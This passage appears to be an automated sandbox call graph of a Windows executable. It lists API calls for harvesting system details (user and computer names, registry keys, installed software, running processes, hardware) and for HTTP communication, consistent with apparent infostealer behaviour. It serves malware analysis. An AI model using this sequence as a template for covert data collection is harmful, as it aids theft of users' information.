lstrcpyA 13162->13163 13164 403bd0 13163->13164 13165 410340 3 API calls 13164->13165 13166 403be4 13165->13166 13167 410290 lstrcpyA 13166->13167 13168 403bec 13167->13168 13169 410340 3 API calls 13168->13169 13170 403c00 13169->13170 13171 410290 lstrcpyA 13170->13171 13172 403c08 13171->13172 13173 410340 3 API calls 13172->13173 13174 403c1c 13173->13174 13175 410290 lstrcpyA 13174->13175 13176 403c24 13175->13176 13177 4102e0 2 API calls 13176->13177 13178 403c3a 13177->13178 13179 410290 lstrcpyA 13178->13179 13180 403c42 13179->13180 13181 410340 3 API calls 13180->13181 13182 403c56 13181->13182 13183 410290 lstrcpyA 13182->13183 13184 403c5e 13183->13184 13185 410340 3 API calls 13184->13185 13186 403c72 13185->13186 13187 410290 lstrcpyA 13186->13187 13188 403c7a 13187->13188 13189 4102e0 2 API calls 13188->13189 13190 403c8d 13189->13190 13191 410290 lstrcpyA 13190->13191 13192 403c95 13191->13192 13193 410340 3 API calls 13192->13193 13194 403ca9 13193->13194 13195 410290 lstrcpyA 13194->13195 13196 403cb1 13195->13196 13197 410340 3 API calls 13196->13197 13198 403cc5 13197->13198 13199 410290 lstrcpyA 13198->13199 13200 403ccd 13199->13200 13201 410340 3 API calls 13200->13201 13202 403ce1 13201->13202 13203 410290 lstrcpyA 13202->13203 13204 403ce9 13203->13204 13205 410340 3 API calls 13204->13205 13206 403cfd 13205->13206 13207 410290 lstrcpyA 13206->13207 13208 403d05 13207->13208 13209 410340 3 API calls 13208->13209 13210 403d1a 13209->13210 13211 410290 lstrcpyA 13210->13211 13212 403d22 13211->13212 13213 410340 3 API calls 13212->13213 13214 403d36 13213->13214 13215 410290 lstrcpyA 13214->13215 13216 403d3e 13215->13216 13217 410340 3 API calls 13216->13217 13218 403d52 13217->13218 13219 410290 lstrcpyA 13218->13219 13220 403d5a 13219->13220 13221 4102e0 2 API calls 13220->13221 13222 403d6d 13221->13222 13223 410290 lstrcpyA 13222->13223 13224 403d75 13223->13224 13225 410340 3 API calls 13224->13225 13226 403d89 13225->13226 13227 410290 lstrcpyA 13226->13227 13228 403d91 13227->13228 13229 410340 3 API calls 13228->13229 13230 403da5 13229->13230 13231 410290 lstrcpyA 13230->13231 13232 403dad 13231->13232 13233 410340 3 API calls 13232->13233 13234 403dc1 13233->13234 13235 410290 lstrcpyA 13234->13235 13236 403dc9 13235->13236 13237 410340 3 API calls 13236->13237 13238 403ddd 13237->13238 13239 410290 lstrcpyA 13238->13239 13240 403de5 13239->13240 13241 4102e0 2 API calls 13240->13241 13242 403df8 13241->13242 13243 410290 lstrcpyA 13242->13243 13244 403e00 13243->13244 13245 403e14 lstrlenA 13244->13245 13871 410530 13245->13871 13247 403e27 lstrlenA GetProcessHeap HeapAlloc 13248 403f35 InternetCloseHandle InternetCloseHandle InternetCloseHandle 13247->13248 13250 403e4b 13247->13250 13249 4101c0 lstrcpyA 13248->13249 13249->13132 13251 403e65 lstrlenA memcpy 13250->13251 13872 410530 13251->13872 13253 403e81 lstrlenA 13254 403e93 13253->13254 13255 403ea3 lstrlenA memcpy 13254->13255 13257 403ec0 13255->13257 13256 403ed8 lstrlenA 13256->13257 13257->13256 13258 403f62 13257->13258 13259 403ef6 Sleep 13257->13259 13262 403f6e GetProcessHeap HeapFree 13258->13262 13260 403f10 13259->13260 13261 403f0b 13259->13261 13264 403f1c GetProcessHeap HeapFree 13260->13264 13261->13257 13261->13260 13263 403f80 InternetReadFile 13262->13263 13265 403ff7 InternetCloseHandle 13263->13265 13268 403f9d 13263->13268 13264->13248 13264->13263 13265->13149 13266 410340 3 API calls 13266->13268 13267 410290 lstrcpyA 13267->13268 13268->13265 13268->13266 13268->13267 13269 403fd9 InternetReadFile 13268->13269 13269->13265 13269->13268 13877 410530 13270->13877 13272 412d69 strtok_s 13275 412d84 13272->13275 13280 412e3e 13272->13280 13273 412db0 strtok_s 13273->13275 13273->13280 13274 412e8b StrCmpCA 13279 412ec0 strtok_s 13274->13279 13275->13273 13275->13274 13276 410240 lstrlenA lstrcpyA 13275->13276 13275->13280 13292 412fca 13275->13292 13276->13275 13277 410240 lstrlenA lstrcpyA 13277->13292 13278 410240 lstrlenA lstrcpyA 13278->13280 13279->13280 13281 412f4d 13279->13281 13280->12564 13280->13274 13280->13278 13280->13279 13284 413262 StrCmpCA 13280->13284 13280->13292 13281->12564 13282 413010 strtok_s 13282->13292 13295 4132d3 13282->13295 13283 41307f lstrcpyA 13878 411550 SHGetFolderPathA 13283->13878 13285 413277 StrCmpCA 13284->13285 13284->13292 13285->13292 13287 4133a0 StrCmpCA 13293 413360 strtok_s 13287->13293 13287->13295 13288 413384 StrCmpCA 13288->13293 13288->13295 13289 4133d8 StrCmpCA 13289->13293 13289->13295 13290 4133bc StrCmpCA 13290->13293 13290->13295 13291 41340c StrCmpCA 13291->13293 13291->13295 13292->13277 13292->13282 13292->13283 13292->13284 13292->13287 13292->13288 13292->13289 13292->13290 13292->13291 13292->13295 13302 4130ac lstrcpyA 13292->13302 13303 4130d8 lstrcpyA 13292->13303 13304 413104 lstrcpyA 13292->13304 13305 413130 lstrcpyA 13292->13305 13306 411550 lstrcpyA SHGetFolderPathA 13292->13306 13307 41315c lstrcpyA 13292->13307 13308 413188 lstrcpyA 13292->13308 13309 4131b4 lstrcpyA 13292->13309 13310 4131e0 lstrcpyA 13292->13310 13293->13295 13296 4134f6 13293->13296 13294 410240 2 API calls 13294->13295 13295->12564 13295->13287 13295->13288 13295->13289 13295->13290 13295->13291 13295->13293 13295->13294 13297 4134b3 StrCmpCA 13295->13297 13298 413452 StrCmpCA 13295->13298 13299 413475 StrCmpCA 13295->13299 13300 413494 StrCmpCA 13295->13300 13301 41342f StrCmpCA 13295->13301 13296->12564 13297->13295 13298->13293 13298->13295 13299->13295 13300->13295 13301->13293 13301->13295 13302->13292 13303->13292 13304->13292 13305->13292 13306->13292 13307->13292 13308->13292 13309->13292 13310->13292 13881 410530 13311->13881 13313 412aa9 strtok_s 13314 412c24 13313->13314 13321 412ac4 13313->13321 13314->12578 13315 412b00 strtok_s 13315->13314 13315->13321 13316 412bc3 StrCmpCA 13316->13321 13317 412acb StrCmpCA 13317->13315 13318 412b92 StrCmpCA 13318->13321 13319 412b3f StrCmpCA 13319->13321 13320 410240 lstrlenA lstrcpyA 13320->13321 13321->13315 13321->13316 13321->13317 13321->13318 13321->13319 13321->13320 13323 412d8b 13321->13323 13327 412e3e 13321->13327 13322 410240 lstrlenA lstrcpyA 13322->13323 13323->13322 13325 412db0 strtok_s 13323->13325 13326 412e8b StrCmpCA 13323->13326 13323->13327 13333 412fca 13323->13333 13324 412ec0 strtok_s 13324->13327 13328 412f4d 13324->13328 13325->13323 13325->13327 13326->13324 13327->12578 13327->13324 13327->13326 13329 413262 StrCmpCA 13327->13329 13331 410240 lstrlenA lstrcpyA 13327->13331 13327->13333 13328->12578 13330 413277 StrCmpCA 13329->13330 13329->13333 13330->13333 13331->13327 13332 410240 lstrlenA lstrcpyA 13332->13333 13333->13329 13333->13332 13334 413010 strtok_s 13333->13334 13335 41307f lstrcpyA 13333->13335 13337 4133a0 StrCmpCA 13333->13337 13338 413384 StrCmpCA 13333->13338 13339 4133d8 StrCmpCA 13333->13339 13340 4133bc StrCmpCA 13333->13340 13341 41340c StrCmpCA 13333->13341 13344 4132d3 13333->13344 13346 4130ac lstrcpyA 13333->13346 13352 4130d8 lstrcpyA 13333->13352 13353 413104 lstrcpyA 13333->13353 13354 411550 lstrcpyA SHGetFolderPathA 13333->13354 13355 413130 lstrcpyA 13333->13355 13356 41315c lstrcpyA 13333->13356 13357 413188 lstrcpyA 13333->13357 13358 4131b4 lstrcpyA 13333->13358 13359 4131e0 lstrcpyA 13333->13359 13334->13333 13334->13344 13336 411550 2 API calls 13335->13336 13336->13333 13342 413360 strtok_s 13337->13342 13337->13344 13338->13342 13338->13344 13339->13342 13339->13344 13340->13342 13340->13344 13341->13342 13341->13344 13342->13344 13345 4134f6 13342->13345 13343 410240 2 API calls 13343->13344 13344->12578 13344->13337 13344->13338 13344->13339 13344->13340 13344->13341 13344->13342 13344->13343 13347 4134b3 StrCmpCA 13344->13347 13348 413452 StrCmpCA 13344->13348 13349 413475 StrCmpCA 13344->13349 13350 413494 StrCmpCA 13344->13350 13351 41342f StrCmpCA 13344->13351 13345->12578 13346->13333 13347->13344 13348->13342 13348->13344 13349->13344 13350->13344 13351->13342 13351->13344 13352->13333 13353->13333 13354->13333 13355->13333 13356->13333 13357->13333 13358->13333 13359->13333 13882 410530 13360->13882 13362 412c59 strtok_s 13363 412d34 13362->13363 13365 412c74 13362->13365 13363->12592 13364 412cf0 StrCmpCA 13364->13365 13365->13364 13366 410240 lstrlenA lstrcpyA 13365->13366 13367 412ca5 strtok_s 13365->13367 13366->13365 13367->13363 13367->13365 13369 4101c0 lstrcpyA 13368->13369 13370 413528 13369->13370 13371 410340 3 API calls 13370->13371 13372 413538 13371->13372 13373 410290 lstrcpyA 13372->13373 13374 413540 13373->13374 13375 410340 3 API calls 13374->13375 13376 413555 13375->13376 13377 410290 lstrcpyA 13376->13377 13378 41355d 13377->13378 13379 410340 3 API calls 13378->13379 13380 413571 13379->13380 13381 410290 lstrcpyA 13380->13381 13382 413579 13381->13382 13383 410340 3 API calls 13382->13383 13384 41358d 13383->13384 13385 410290 lstrcpyA 13384->13385 13386 413595 13385->13386 13387 410340 3 API calls 13386->13387 13388 4135a9 13387->13388 13389 410290 lstrcpyA 13388->13389 13390 4135b1 13389->13390 13883 410920 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 13390->13883 13392 4135bd 13393 410340 3 API calls 13392->13393 13394 4135c6 13393->13394 13395 410290 lstrcpyA 13394->13395 13396 4135ce 13395->13396 13397 410340 3 API calls 13396->13397 13398 4135e2 13397->13398 13399 410290 lstrcpyA 13398->13399 13400 4135ea 13399->13400 13401 410340 3 API calls 13400->13401 13402 4135fe 13401->13402 13403 410290 lstrcpyA 13402->13403 13404 413606 13403->13404 13884 411120 RegOpenKeyExA 13404->13884 13406 413612 13407 410340 3 API calls 13406->13407 13408 41361b 13407->13408 13409 410290 lstrcpyA 13408->13409 13410 413623 13409->13410 13411 410340 3 API calls 13410->13411 13412 413637 13411->13412 13413 410290 lstrcpyA 13412->13413 13414 41363f 13413->13414 13415 410340 3 API calls 13414->13415 13416 413653 13415->13416 13417 410290 lstrcpyA 13416->13417 13418 41365b 13417->13418 13419 410700 7 API calls 13418->13419 13420 41366b 13419->13420 13421 4102e0 2 API calls 13420->13421 13422 413674 13421->13422 13423 410290 lstrcpyA 13422->13423 13424 41367c 13423->13424 13425 410340 3 API calls 13424->13425 13426 413697 13425->13426 13427 410290 lstrcpyA 13426->13427 13428 41369f 13427->13428 13429 410340 3 API calls 13428->13429 13430 4136b3 13429->13430 13431 410290 lstrcpyA 13430->13431 13432 4136bb 13431->13432 13433 410540 14 API calls 13432->13433 13434 4136c8 13433->13434 13435 4102e0 2 API calls 13434->13435 13436 4136d1 13435->13436 13437 410290 lstrcpyA 13436->13437 13438 4136d9 13437->13438 13439 410340 3 API calls 13438->13439 13440 4136f4 13439->13440 13441 410290 lstrcpyA 13440->13441 13442 4136fc 13441->13442 13443 410340 3 API calls 13442->13443 13444 413710 13443->13444 13445 410290 lstrcpyA 13444->13445 13446 413718 13445->13446 13447 41371f GetCurrentProcessId 13446->13447 13887 411cc0 OpenProcess 13447->13887 13450 4102e0 2 API calls 13451 413735 13450->13451 13452 410290 lstrcpyA 13451->13452 13453 41373d 13452->13453 13454 410340 3 API calls 13453->13454 13455 413758 13454->13455 13456 410290 lstrcpyA 13455->13456 13457 413760 13456->13457 13458 410340 3 API calls 13457->13458 13459 413774 13458->13459 13460 410290 lstrcpyA 13459->13460 13461 41377c 13460->13461 13462 410340 3 API calls 13461->13462 13463 413790 13462->13463 13464 410290 lstrcpyA 13463->13464 13465 413798 13464->13465 13466 410340 3 API calls 13465->13466 13467 4137ac 13466->13467 13468 410290 lstrcpyA 13467->13468 13469 4137b4 13468->13469 13892 4107c0 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc RegOpenKeyExA 13469->13892 13472 410340 3 API calls 13473 4137c9 13472->13473 13474 410290 lstrcpyA 13473->13474 13475 4137d1 13474->13475 13476 410340 3 API calls 13475->13476 13477 4137e5 13476->13477 13478 410290 lstrcpyA 13477->13478 13479 4137ed 13478->13479 13480 410340 3 API calls 13479->13480 13481 413801 13480->13481 13482 410290 lstrcpyA 13481->13482 13483 413809 13482->13483 13900 411200 13483->13900 13486 4102e0 2 API calls 13487 41381f 13486->13487 13488 410290 lstrcpyA 13487->13488 13489 413827 13488->13489 13490 410340 3 API calls 13489->13490 13491 413842 13490->13491 13492 410290 lstrcpyA 13491->13492 13493 41384a 13492->13493 13494 410340 3 API calls 13493->13494 13495 41385e 13494->13495 13496 410290 lstrcpyA 13495->13496 13497 413866 13496->13497 13498 411200 lstrcpyA 13497->13498 13499 413873 13498->13499 13500 4102e0 2 API calls 13499->13500 13501 41387c 13500->13501 13502 410290 lstrcpyA 13501->13502 13503 413884 13502->13503 13504 410340 3 API calls 13503->13504 13505 41389f 13504->13505 13506 410290 lstrcpyA 13505->13506 13507 4138a7 13506->13507 13508 410340 3 API calls 13507->13508 13509 4138bb 13508->13509 13510 410290 lstrcpyA 13509->13510 13511 4138c3 13510->13511 13903 4108e0 GetProcessHeap HeapAlloc GetComputerNameA 13511->13903 13513 4138cf 13514 410340 3 API calls 13513->13514 13515 4138d8 13514->13515 13516 410290 lstrcpyA 13515->13516 13517 4138e0 13516->13517 13518 410340 3 API calls 13517->13518 13519 4138f4 13518->13519 13520 410290 lstrcpyA 13519->13520 13521 4138fc 13520->13521 13522 410340 3 API calls 13521->13522 13523 413910 13522->13523 13524 410290 lstrcpyA 13523->13524 13525 413918 13524->13525 13904 4108b0 GetProcessHeap HeapAlloc GetUserNameA 13525->13904 13527 413924 13528 410340 3 API calls 13527->13528 13529 41392d 13528->13529 13530 410290 lstrcpyA 13529->13530 13531 413935 13530->13531 13532 410340 3 API calls 13531->13532 13533 413949 13532->13533 13534 410290 lstrcpyA 13533->13534 13535 413951 13534->13535 13536 410340 3 API calls 13535->13536 13537 413965 13536->13537 13538 410290 lstrcpyA 13537->13538 13539 41396d 13538->13539 13905 4110a0 7 API calls 13539->13905 13542 4102e0 2 API calls 13543 413983 13542->13543 13544 410290 lstrcpyA 13543->13544 13545 41398b 13544->13545 13546 410340 3 API calls 13545->13546 13547 4139a6 13546->13547 13548 410290 lstrcpyA 13547->13548 13549 4139ae 13548->13549 13550 410340 3 API calls 13549->13550 13551 4139c2 13550->13551 13552 410290 lstrcpyA 13551->13552 13553 4139ca 13552->13553 13908 4109f0 13553->13908 13556 4102e0 2 API calls 13557 4139e0 13556->13557 13558 410290 lstrcpyA 13557->13558 13559 4139e8 13558->13559 13560 410340 3 API calls 13559->13560 13561 413a03 13560->13561 13562 410290 lstrcpyA 13561->13562 13563 413a0b 13562->13563 13564 410340 3 API calls 13563->13564 13565 413a1f 13564->13565 13566 410290 lstrcpyA 13565->13566 13567 413a27 13566->13567 13926 410920 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 13567->13926 13569 413a33 13570 410340 3 API calls 13569->13570 13571 413a3c 13570->13571 13572 410290 lstrcpyA 13571->13572 13573 413a44 13572->13573 13574 410340 3 API calls 13573->13574 13575 413a58 13574->13575 13576 410290 lstrcpyA 13575->13576 13577 413a60 13576->13577 13578 410340 3 API calls 13577->13578 13579 413a74 13578->13579 13580 410290 lstrcpyA 13579->13580 13581 413a7c 13580->13581 13927 410990 GetProcessHeap HeapAlloc GetTimeZoneInformation 13581->13927 13584 410340 3 API calls 13585 413a91 13584->13585 13586 410290 lstrcpyA 13585->13586 13587 413a99 13586->13587 13588 410340 3 API calls 13587->13588 13589 413aad 13588->13589 13590 410290 lstrcpyA 13589->13590 13591 413ab5 13590->13591 13592 410340 3 API calls 13591->13592 13593 413ac9 13592->13593 13594 410290 lstrcpyA 13593->13594 13595 413ad1 13594->13595 13596 410340 3 API calls 13595->13596 13597 413ae5 13596->13597 13598 410290 lstrcpyA 13597->13598 13599 413aed 13598->13599 13930 410b30 GetProcessHeap HeapAlloc RegOpenKeyExA 13599->13930 13601 413af9 13602 410340 3 API calls 13601->13602 13603 413b02 13602->13603 13604 410290 lstrcpyA 13603->13604 13605 413b0a 13604->13605 13606 410340 3 API calls 13605->13606 13607 413b1e 13606->13607 13608 410290 lstrcpyA 13607->13608 13609 413b26 13608->13609 13610 410340 3 API calls 13609->13610 13611 413b3a 13610->13611 13612 410290 lstrcpyA 13611->13612 13613 413b42 13612->13613 13933 410be0 13613->13933 13616 410340 3 API calls 13617 413b57 13616->13617 13618 410290 lstrcpyA 13617->13618 13619 413b5f 13618->13619 13620 410340 3 API calls 13619->13620 13621 413b73 13620->13621 13622 410290 lstrcpyA 13621->13622 13623 413b7b 13622->13623 13624 410340 3 API calls 13623->13624 13625 413b8f 13624->13625 13626 410290 lstrcpyA 13625->13626 13627 413b97 13626->13627 13950 410ba0 GetSystemInfo wsprintfA 13627->13950 13629 413ba3 13630 410340 3 API calls 13629->13630 13631 413bac 13630->13631 13632 410290 lstrcpyA 13631->13632 13633 413bb4 13632->13633 13634 410340 3 API calls 13633->13634 13635 413bc8 13634->13635 13636 410290 lstrcpyA 13635->13636 13637 413bd0 13636->13637 13638 410340 3 API calls 13637->13638 13639 413be4 13638->13639 13640 410290 lstrcpyA 13639->13640 13641 413bec 13640->13641 13951 410cb0 GetProcessHeap HeapAlloc 13641->13951 13643 413bf8 13644 410340 3 API calls 13643->13644 13645 413c01 13644->13645 13646 410290 lstrcpyA 13645->13646 13647 413c09 13646->13647 13648 410340 3 API calls 13647->13648 13649 413c1d 13648->13649 13650 410290 lstrcpyA 13649->13650 13651 413c25 13650->13651 13652 410340 3 API calls 13651->13652 13653 413c39 13652->13653 13654 410290 lstrcpyA 13653->13654 13655 413c41 13654->13655 13954 410d30 13655->13954 13658 4102e0 2 API calls 13659 413c57 13658->13659 13660 410290 lstrcpyA 13659->13660 13661 413c5f 13660->13661 13662 410340 3 API calls 13661->13662 13663 413c7a 13662->13663 13664 410290 lstrcpyA 13663->13664 13665 413c82 13664->13665 13666 410340 3 API calls 13665->13666 13667 413c96 13666->13667 13668 410290 lstrcpyA 13667->13668 13669 413c9e 13668->13669 13959 410fe0 13669->13959 13671 413cab 13672 4102e0 2 API calls 13671->13672 13673 413cb4 13672->13673 13674 410290 lstrcpyA 13673->13674 13675 413cbc 13674->13675 13676 410340 3 API calls 13675->13676 13677 413cd7 13676->13677 13678 410290 lstrcpyA 13677->13678 13679 413cdf 13678->13679 13680 410340 3 API calls 13679->13680 13681 413cf3 13680->13681 13682 410290 lstrcpyA 13681->13682 13683 413cfb 13682->13683 13968 410d80 13683->13968 13686 4102e0 2 API calls 13687 413d16 13686->13687 13688 410290 lstrcpyA 13687->13688 13689 413d1e 13688->13689 13690 410d80 16 API calls 13689->13690 13691 413d37 13690->13691 13692 4102e0 2 API calls 13691->13692 13693 413d40 13692->13693 13694 410290 lstrcpyA 13693->13694 13695 413d48 13694->13695 13696 410340 3 API calls 13695->13696 13697 413d63 13696->13697 13698 410290 lstrcpyA 13697->13698 13699 413d6b 13698->13699 13700 413d8a lstrlenA 13699->13700 13701 413d97 13700->13701 13702 4101c0 lstrcpyA 13701->13702 13703 413da7 13702->13703 13704 410200 lstrcpyA 13703->13704 13705 413db3 13704->13705 13706 410200 lstrcpyA 13705->13706 13707 413dbf 13706->13707 13708 410200 lstrcpyA 13707->13708 13709 413dcb 13708->13709 13710 410200 lstrcpyA 13709->13710 13711 413de1 13710->13711 13984 413e50 13711->13984 13713 413e0f 13713->12602 13715 40e806 13714->13715 13753 40e456 13714->13753 13716 410200 lstrcpyA 13715->13716 13717 40e81a 13716->13717 13719 410200 lstrcpyA 13717->13719 13718 40e4ad StrCmpCA 13718->13753 13720 40e829 13719->13720 13721 410200 lstrcpyA 13720->13721 13723 40e838 13721->13723 13722 40e5b3 StrCmpCA 13722->13753 13724 410200 lstrcpyA 13723->13724 13726 40e84e 13724->13726 13725 4101c0 lstrcpyA 13725->13753 14791 40d9c0 memset memset memset memset RegOpenKeyExA 13726->14791 13727 40e73a StrCmpCA 13727->13753 13729 410340 lstrlenA lstrcpyA lstrcatA 13729->13753 13730 40e86b 13731 410200 lstrcpyA 13730->13731 13733 40e87c 13731->13733 13732 4102e0 2 API calls 13732->13753 13734 410200 lstrcpyA 13733->13734 13735 40e887 13734->13735 13736 410200 lstrcpyA 13735->13736 13738 40e892 13736->13738 13737 410290 lstrcpyA 13737->13753 13739 410200 lstrcpyA 13738->13739 13740 40e8a8 13739->13740 14826 40de80 13740->14826 13741 410200 lstrcpyA 13741->13753 13745 40e91d StrCmpCA 13759 40e8c5 13745->13759 13746 40ea23 StrCmpCA 13746->13759 13747 40ec76 13748 4101c0 lstrcpyA 13748->13759 13749 40ebaa StrCmpCA 13749->13759 13750 4102e0 2 API calls 13750->13759 13751 410340 lstrlenA lstrcpyA lstrcatA 13751->13759 13752 410290 lstrcpyA 13752->13759 13753->13715 13753->13718 13753->13722 13753->13725 13753->13727 13753->13729 13753->13732 13753->13737 13753->13741 14496 40b0f0 13753->14496 14572 40b4e0 13753->14572 14729 40cdf0 13753->14729 13754 40b0f0 443 API calls 13754->13759 13756 40cdf0 61 API calls 13756->13759 13757 410200 lstrcpyA 13757->13759 13758 40b4e0 444 API calls 13758->13759 13759->13745 13759->13746 13759->13747 13759->13748 13759->13749 13759->13750 13759->13751 13759->13752 13759->13754 13759->13756 13759->13757 13759->13758 13761 410409 13760->13761 13762 4103b2 13760->13762 13763 4103d7 lstrcpyA 13762->13763 13764 4103c9 13762->13764 13763->13764 13764->12849 13766 410200 lstrcpyA 13765->13766 13767 416930 13766->13767 13768 410200 lstrcpyA 13767->13768 13769 416939 13768->13769 13808 404280 13769->13808 13771 416943 13772 4101c0 lstrcpyA 13771->13772 13773 416954 13772->13773 13834 410500 StrCmpCA 13773->13834 13775 41695c 13775->12886 13777 4169dd 13776->13777 13778 4101c0 lstrcpyA 13777->13778 13779 4169f1 13778->13779 13780 410200 lstrcpyA 13779->13780 13781 4169fa 13780->13781 13782 404280 21 API calls 13781->13782 13783 416a04 13782->13783 13784 410290 lstrcpyA 13783->13784 13785 416a11 13784->13785 13786 416a25 StrCmpCA 13785->13786 13787 416a35 13786->13787 13788 416abb 13786->13788 13790 416a45 lstrlenA 13787->13790 13789 4101c0 lstrcpyA 13788->13789 13803 416ab9 13789->13803 13791 416a51 13790->13791 13843 4115b0 13791->13843 13793 416a58 13793->13788 13794 416a5c 13793->13794 13795 416a6c StrStrA 13794->13795 13796 416a7e 13795->13796 13795->13803 13798 416a8e lstrlenA 13796->13798 13797 4101c0 lstrcpyA 13797->13803 13847 411490 13798->13847 13801 416ab0 13805 4101c0 lstrcpyA 13801->13805 13802 416b28 13804 4101c0 lstrcpyA 13802->13804 13803->13797 13804->13803 13805->13803 13806->12868 13807->12886 13809 410200 lstrcpyA 13808->13809 13810 4042a9 13809->13810 13835 402790 ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI 13810->13835 13812 4042b3 13813 4101c0 lstrcpyA 13812->13813 13814 4042c2 13813->13814 13815 4042cf InternetOpenA StrCmpCA 13814->13815 13816 404302 InternetConnectA 13815->13816 13817 404444 13815->13817 13816->13817 13818 40433b HttpOpenRequestA 13816->13818 13821 4101c0 lstrcpyA 13817->13821 13819 404371 13818->13819 13820 40446b InternetCloseHandle 13818->13820 13822 404377 InternetSetOptionA 13819->13822 13823 40438d HttpSendRequestA HttpQueryInfoA 13819->13823 13820->13817 13829 404451 13821->13829 13822->13823 13824 4043c1 13823->13824 13825 40445c 13823->13825 13824->13825 13833 4043d2 13824->13833 13826 4101c0 lstrcpyA 13825->13826 13826->13829 13827 404477 InternetCloseHandle 13828 410200 lstrcpyA 13827->13828 13828->13829 13829->13771 13830 4043f0 InternetReadFile 13830->13827 13830->13833 13831 410340 3 API calls 13831->13833 13832 410290 lstrcpyA 13832->13833 13833->13827 13833->13830 13833->13831 13833->13832 13834->13775 13841 410530 13835->13841 13837 4028e9 lstrlenA 13842 410530 13837->13842 13839 4028f5 InternetCrackUrlA 13840 402903 13839->13840 13840->13812 13841->13837 13842->13839 13844 4115c2 13843->13844 13846 4115e2 13843->13846 13845 4115ce LocalAlloc 13844->13845 13844->13846 13845->13846 13846->13793 13846->13846 13848 41149b lstrlenA 13847->13848 13848->13801 13848->13802 13850 410720 13849->13850 13851 41079e 13849->13851 13852 4101c0 lstrcpyA 13850->13852 13853 4101c0 lstrcpyA 13851->13853 13854 410730 memset 13852->13854 13855 4107aa 13853->13855 13856 410754 13854->13856 13855->12915 13857 411e60 3 API calls 13856->13857 13858 410761 13857->13858 13859 410768 lstrcatA 13858->13859 13868 410230 13859->13868 13861 41077a lstrcatA 13862 41078d 13861->13862 13863 4101c0 lstrcpyA 13862->13863 13864 410795 13863->13864 13864->13855 13866 4101c0 lstrcpyA 13865->13866 13867 411e96 13866->13867 13867->12919 13869 410237 13868->13869 13869->13861 13870->13066 13871->13247 13872->13253 13874 4077b8 LocalAlloc 13873->13874 13876 40402f 13874->13876 13876->13110 13876->13112 13877->13272 13879 4101c0 lstrcpyA 13878->13879 13880 411597 13879->13880 13880->13292 13881->13313 13882->13362 13883->13392 13885 4111d5 RegCloseKey CharToOemA 13884->13885 13886 4111b8 RegQueryValueExA 13884->13886 13885->13406 13886->13885 13888 411d01 13887->13888 13889 411ce7 K32GetModuleFileNameExA CloseHandle 13887->13889 13890 4101c0 lstrcpyA 13888->13890 13889->13888 13891 411d0b 13890->13891 13891->13450 13893 410824 RegQueryValueExA 13892->13893 13894 41083d RegCloseKey 13892->13894 13893->13894 13895 41084c 13894->13895 13896 41089b 13895->13896 13897 41085b RegOpenKeyExA 13895->13897 13896->13472 13898 410890 RegCloseKey 13897->13898 13899 410877 RegQueryValueExA 13897->13899 13898->13896 13899->13898 13901 4101c0 lstrcpyA 13900->13901 13902 411211 13901->13902 13902->13486 13903->13513 13904->13527 13906 4101c0 lstrcpyA 13905->13906 13907 41110b 13906->13907 13907->13542 13909 4101c0 lstrcpyA 13908->13909 13910 410a0d GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 13909->13910 13911 410a3b GetLocaleInfoA 13910->13911 13925 410b0f 13910->13925 13912 410340 3 API calls 13911->13912 13915 410a64 13912->13915 13913 410b17 LocalFree 13914 410b1e 13913->13914 13914->13556 13916 410290 lstrcpyA 13915->13916 13917 410a6c 13916->13917 14000 411270 13917->14000 13919 410aa0 GetLocaleInfoA 13920 410340 3 API calls 13919->13920 13921 410a84 13920->13921 13921->13913 13921->13919 13922 410340 3 API calls 13921->13922 13923 410290 lstrcpyA 13921->13923 13924 411270 memset 13921->13924 13921->13925 13922->13921 13923->13921 13924->13921 13925->13913 13925->13914 13926->13569 13928 4109e5 13927->13928 13929 4109bd wsprintfA 13927->13929 13928->13584 13929->13928 13931 410b72 RegQueryValueExA 13930->13931 13932 410b8b RegCloseKey 13930->13932 13931->13932 13932->13601 13934 410c12 GetLogicalProcessorInformationEx 13933->13934 13935 410c36 13934->13935 13936 410c1f GetLastError 13934->13936 13937 410c97 13935->13937 13938 410c3d 13935->13938 13939 410c86 13936->13939 13940 410c2a 13936->13940 13941 4112b0 2 API calls 13937->13941 13946 4112b0 2 API calls 13938->13946 13945 4112b0 2 API calls 13939->13945 13947 410c95 13939->13947 13942 410c00 13940->13942 13941->13947 13942->13934 13942->13947 14003 4112e0 GetProcessHeap HeapAlloc 13942->14003 14004 4112b0 13942->14004 13945->13947 13948 410c6c 13946->13948 13947->13616 13948->13947 13949 410c70 wsprintfA 13948->13949 13949->13947 13950->13629 13952 411270 memset 13951->13952 13953 410cdf GlobalMemoryStatusEx wsprintfA 13952->13953 13953->13643 13955 4101c0 lstrcpyA 13954->13955 13956 410d4a 13955->13956 13957 410d70 13956->13957 13958 410240 2 API calls 13956->13958 13957->13658 13958->13957 13960 4101c0 lstrcpyA 13959->13960 13961 410ffd CreateToolhelp32Snapshot Process32First 13960->13961 13962 411021 Process32Next 13961->13962 13963 411084 CloseHandle 13961->13963 13962->13963 13966 411031 13962->13966 13963->13671 13964 410290 lstrcpyA 13964->13966 13965 410340 lstrlenA lstrcpyA lstrcatA 13965->13966 13966->13964 13966->13965 13967 411074 Process32Next 13966->13967 13967->13963 13967->13966 13969 4101c0 lstrcpyA 13968->13969 13970 410da4 RegOpenKeyExA 13969->13970 13971 410fcc 13970->13971 13972 410ddc RegEnumKeyExA 13970->13972 13971->13686 13973 410fbb RegCloseKey 13972->13973 13974 410e1e 13972->13974 13973->13971 13975 410e74 wsprintfA RegOpenKeyExA 13974->13975 13976 410fb1 RegCloseKey 13975->13976 13977 410eae RegQueryValueExA 13975->13977 13976->13973 13978 410e30 RegCloseKey RegEnumKeyExA 13977->13978 13979 410edb lstrlenA 13977->13979 13978->13973 13978->13975 13979->13978 13983 410eeb 13979->13983 13980 410f39 RegQueryValueExA 13980->13978 13980->13983 13981 410340 lstrlenA lstrcpyA lstrcatA 13981->13983 13982 410290 lstrcpyA 13982->13983 13983->13978 13983->13980 13983->13981 13983->13982 13985 413e69 13984->13985 13986 410290 lstrcpyA 13985->13986 13987 413eac 13986->13987 13988 410290 lstrcpyA 13987->13988 13989 413ee1 13988->13989 13990 410290 lstrcpyA 13989->13990 13991 413eef 13990->13991 13992 410290 lstrcpyA 13991->13992 13993 413efb 13992->13993 13994 413f0a Sleep 13993->13994 13997 413f17 13993->13997 13994->13993 13995 413f5a CreateThread WaitForSingleObject 13996 4101c0 lstrcpyA 13995->13996 